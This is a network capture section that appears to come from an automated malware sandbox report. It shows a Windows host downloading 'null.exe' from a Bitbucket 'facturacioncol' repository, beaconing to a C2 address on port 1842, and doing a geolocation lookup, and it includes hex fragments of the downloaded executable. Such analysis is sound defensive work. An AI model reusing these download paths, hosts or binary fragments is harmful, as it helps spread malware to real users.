Dec 12, 2024 17:40:06.528774023 CET	49851	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:06.529887915 CET	49851	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:06.649589062 CET	1842	49851	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:16.542752981 CET	1842	49851	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:16.544992924 CET	49851	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:16.545044899 CET	49851	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:16.664727926 CET	1842	49851	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:17.559484959 CET	49876	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:17.679550886 CET	1842	49876	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:17.679724932 CET	49876	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:17.719003916 CET	49876	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:17.838922977 CET	1842	49876	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:20.085067034 CET	1842	49876	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:20.085127115 CET	49876	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:20.085195065 CET	49876	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:20.204997063 CET	1842	49876	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:21.089349031 CET	49883	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:21.209232092 CET	1842	49883	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:21.209337950 CET	49883	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:21.209783077 CET	49883	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:21.329788923 CET	1842	49883	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:25.809042931 CET	1842	49883	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:25.813107967 CET	49883	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:25.816104889 CET	49883	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:25.936496019 CET	1842	49883	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:26.853673935 CET	49899	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:26.973809958 CET	1842	49899	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:26.974145889 CET	49899	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:26.974690914 CET	49899	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:27.095662117 CET	1842	49899	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:34.613065004 CET	1842	49899	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:34.614157915 CET	49899	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:34.614264965 CET	49899	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:34.734071016 CET	1842	49899	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:35.618581057 CET	49919	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:35.738609076 CET	1842	49919	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:35.739322901 CET	49919	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:35.739866972 CET	49919	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:35.860636950 CET	1842	49919	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:37.944951057 CET	1842	49919	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:37.945115089 CET	49919	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:37.945153952 CET	49919	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:38.065479040 CET	1842	49919	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:38.964440107 CET	49929	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:39.087927103 CET	1842	49929	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:39.089013100 CET	49929	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:39.089013100 CET	49929	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:39.210627079 CET	1842	49929	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:49.095597982 CET	1842	49929	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:49.095710993 CET	49929	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:49.095784903 CET	49929	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:49.215693951 CET	1842	49929	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:50.125607967 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:50.245497942 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:50.245620012 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:50.246375084 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:50.366307974 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:51.523613930 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:51.525521994 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:51.645348072 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:51.758394957 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:51.804692984 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:52.365408897 CET	49962	80	192.168.2.7	178.237.33.50
Dec 12, 2024 17:40:52.485269070 CET	80	49962	178.237.33.50	192.168.2.7
Dec 12, 2024 17:40:52.489165068 CET	49962	80	192.168.2.7	178.237.33.50
Dec 12, 2024 17:40:52.489350080 CET	49962	80	192.168.2.7	178.237.33.50
Dec 12, 2024 17:40:52.609231949 CET	80	49962	178.237.33.50	192.168.2.7
Dec 12, 2024 17:40:53.735573053 CET	80	49962	178.237.33.50	192.168.2.7
Dec 12, 2024 17:40:53.735774994 CET	49962	80	192.168.2.7	178.237.33.50
Dec 12, 2024 17:40:53.813234091 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:40:53.933167934 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:40:54.729554892 CET	80	49962	178.237.33.50	192.168.2.7
Dec 12, 2024 17:40:54.729850054 CET	49962	80	192.168.2.7	178.237.33.50
Dec 12, 2024 17:41:19.663065910 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:41:19.665033102 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:41:19.784857988 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:41:49.759320021 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:41:49.760621071 CET	49955	1842	192.168.2.7	181.131.217.244
Dec 12, 2024 17:41:49.880604029 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:42:20.030867100 CET	1842	49955	181.131.217.244	192.168.2.7
Dec 12, 2024 17:42:20.086258888 CET	49955	1842	192.168.2.7	181.131.217.244

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:39:26.197180986 CET	58055	53	192.168.2.7	1.1.1.1
Dec 12, 2024 17:39:26.337438107 CET	53	58055	1.1.1.1	192.168.2.7
Dec 12, 2024 17:39:28.342310905 CET	56712	53	192.168.2.7	1.1.1.1
Dec 12, 2024 17:39:28.480269909 CET	53	56712	1.1.1.1	192.168.2.7
Dec 12, 2024 17:39:31.146163940 CET	54389	53	192.168.2.7	1.1.1.1
Dec 12, 2024 17:39:31.443614006 CET	53	54389	1.1.1.1	192.168.2.7
Dec 12, 2024 17:40:06.176707983 CET	64667	53	192.168.2.7	1.1.1.1
Dec 12, 2024 17:40:06.404251099 CET	53	64667	1.1.1.1	192.168.2.7
Dec 12, 2024 17:40:52.217497110 CET	49377	53	192.168.2.7	1.1.1.1
Dec 12, 2024 17:40:52.355602980 CET	53	49377	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 17:39:26.197180986 CET	192.168.2.7	1.1.1.1	0xe4ea	Standard query (0)	navegacionseguracol24vip.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:28.342310905 CET	192.168.2.7	1.1.1.1	0x733	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.146163940 CET	192.168.2.7	1.1.1.1	0x3d7c	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:40:06.176707983 CET	192.168.2.7	1.1.1.1	0x49af	Standard query (0)	newstaticfreepoint24.ddns-ip.net	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:40:52.217497110 CET	192.168.2.7	1.1.1.1	0x2b8e	Standard query (0)	geoplugin.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 17:38:55.655136108 CET	1.1.1.1	192.168.2.7	0x48d3	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:38:57.975920916 CET	1.1.1.1	192.168.2.7	0xd75c	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:38:57.975920916 CET	1.1.1.1	192.168.2.7	0xd75c	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:26.337438107 CET	1.1.1.1	192.168.2.7	0xe4ea	No error (0)	navegacionseguracol24vip.org		181.131.217.244	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:28.480269909 CET	1.1.1.1	192.168.2.7	0x733	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:28.480269909 CET	1.1.1.1	192.168.2.7	0x733	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:28.480269909 CET	1.1.1.1	192.168.2.7	0x733	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.193.17	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.49.201	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.135	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.136.233	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.215.105	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.1.2	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.250	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:39:31.443614006 CET	1.1.1.1	192.168.2.7	0x3d7c	No error (0)	s3-w.us-east-1.amazonaws.com		16.15.184.230	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:40:06.404251099 CET	1.1.1.1	192.168.2.7	0x49af	No error (0)	newstaticfreepoint24.ddns-ip.net		181.131.217.244	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:40:52.355602980 CET	1.1.1.1	192.168.2.7	0x2b8e	No error (0)	geoplugin.net		178.237.33.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

bbuseruploads.s3.amazonaws.com

geoplugin.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49962	178.237.33.50	80	8076	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 17:40:52.489350080 CET	71	OUT	GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Dec 12, 2024 17:40:53.735573053 CET	1171	IN	HTTP/1.1 200 OK date: Thu, 12 Dec 2024 16:40:53 GMT server: Apache content-length: 963 content-type: application/json; charset=utf-8 cache-control: public, max-age=300 access-control-allow-origin: * Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED] Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49764	185.166.143.50	443	7716	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:39:30 UTC	101	OUT	GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-12-12 16:39:30 UTC	5939	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 16:39:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED] Expires: Thu, 12 Dec 2024 16:39:30 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 9481e945e625 X-Version: b7875da02c7c X-Static-Version: b7875da02c7c X-Request-Count: 644 X-Render-Time: 0.045706987380981445 X-B3-Traceid: 4f83c2f4a48840c6a386875c079b643f X-B3-Spanid: 08c0a4859afd47a9 X-Frame-Options: SAMEORIGIN Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config- [TRUNCATED] X-Usage-Quota-Remaining: 999144.891 X-Usage-Request-Cost: 868.97 X-Usage-User-Time: 0.023197 X-Usage-System-Time: 0.002872 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: 4f83c2f4a48840c6a386875c079b643f Atl-Request-Id: 4f83c2f4-a488-40c6-a386-875c079b643f Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=156,atl-edge-internal;dur=3,atl-edge-upstream;dur=154,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49770	54.231.193.17	443	7716	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:39:32 UTC	1177	OUT	GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacupf41tUXUKIvQwULtF4tmDv7359nQosi0CBcA%2F4VOm6l [TRUNCATED] Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-12-12 16:39:33 UTC	538	IN	HTTP/1.1 200 OK x-amz-id-2: ij5MFtyRSbDhq4BfK1TPIcshjJFRbRDlI9gjlClQfjGPm+diX+b01iQiEHxzFu4cziCVKqEXeRE= x-amz-request-id: NDXKQ8RR2385DZ9N Date: Thu, 12 Dec 2024 16:39:34 GMT Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT ETag: "27650afe28ba588c759ade95bf403833" x-amz-server-side-encryption: AES256 x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3. Content-Disposition: attachment; filename="null.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 4054528 Server: AmazonS3 Connection: close
2024-12-12 16:39:33 UTC	16384	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-12-12 16:39:33 UTC	486	IN	Data Raw: 77 0f 8d 44 24 04 50 e8 34 c7 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 c9 f5 ff ff 8b 54 24 08 6a 00 50 68 2e 4c 40 00 52 ff 15 18 c0 61 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 c0 61 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 c0 61 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 d6 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 e8 4b 40 00 89 68 08 a3 3c c6 61 00 c3 8d 40 00 31 d2 a1 3c c6 61 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 c6 61 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 16 4d 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b Data Ascii: wD$P4tqD$T$jPh.L@Ra\$;SCtaSatL$Q$1@1Edd@K@h<a@1<atd9udt9uUSVW8aGtH_p3UhM@d2d"~K_
2024-12-12 16:39:33 UTC	16384	IN	Data Raw: ea 26 00 00 83 c6 08 4f 75 ec 5e 5f 5b c3 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 01 da e8 c5 26 00 00 83 c6 08 4f 75 eb 5e 5f 5b c3 8d 40 00 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 16 8b 04 18 03 46 08 89 04 1a 83 c6 0c 4f 75 ec 5e 5f 5b c3 53 56 8b 18 8d 70 04 8b 56 04 8b 06 e8 27 0a 00 00 83 c6 08 4b 75 f0 5e 5b c3 8b c0 53 56 57 be c8 10 61 00 b1 10 8b 1d 00 10 61 00 8b c3 bf 0a 00 00 00 99 f7 ff 80 c2 30 33 c0 8a c1 88 14 06 8b c3 bb 0a 00 00 00 99 f7 fb 8b d8 49 85 db 75 db b1 1c a1 04 10 61 00 8b d0 83 e2 0f 8a 92 e8 10 61 00 33 db 8a d9 88 14 1e c1 e8 04 49 85 c0 75 e6 5f 5e 5b c3 8b c0 31 c0 87 05 00 10 61 00 f7 d8 19 c0 40 bf 38 c6 61 00 8b 5f 18 8b 6f 14 ff 77 1c ff 77 20 8b 37 b9 0b 00 00 00 f3 a5 5f 5e c9 c2 0c 00 Data Ascii: &Ou^_[S1WV<tF&Ou^_[@S1WV<tFFOu^_[SVpV'Ku^[SVWaa03Iuaa3Iu_^[1a@8a_oww 7_^
2024-12-12 16:39:33 UTC	1024	IN	Data Raw: 00 00 c0 8d 40 00 0c 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 3c 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 8e 40 00 0c 00 00 00 5c 11 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0e 00 00 00 00 00 01 00 00 00 08 11 40 00 04 00 00 00 09 45 78 63 65 70 74 69 6f 6e a4 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a4 8e 40 00 0c 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 06 45 41 62 6f 72 74 90 f8 8e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 40 00 10 00 00 00 f0 8d 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 Data Ascii: @<@<@N@\@E@E@E@E@E@PB@lB@B@@Exception@@@E@E@E@E@E@PB@lB@B@EAbort@@@E@E@E@
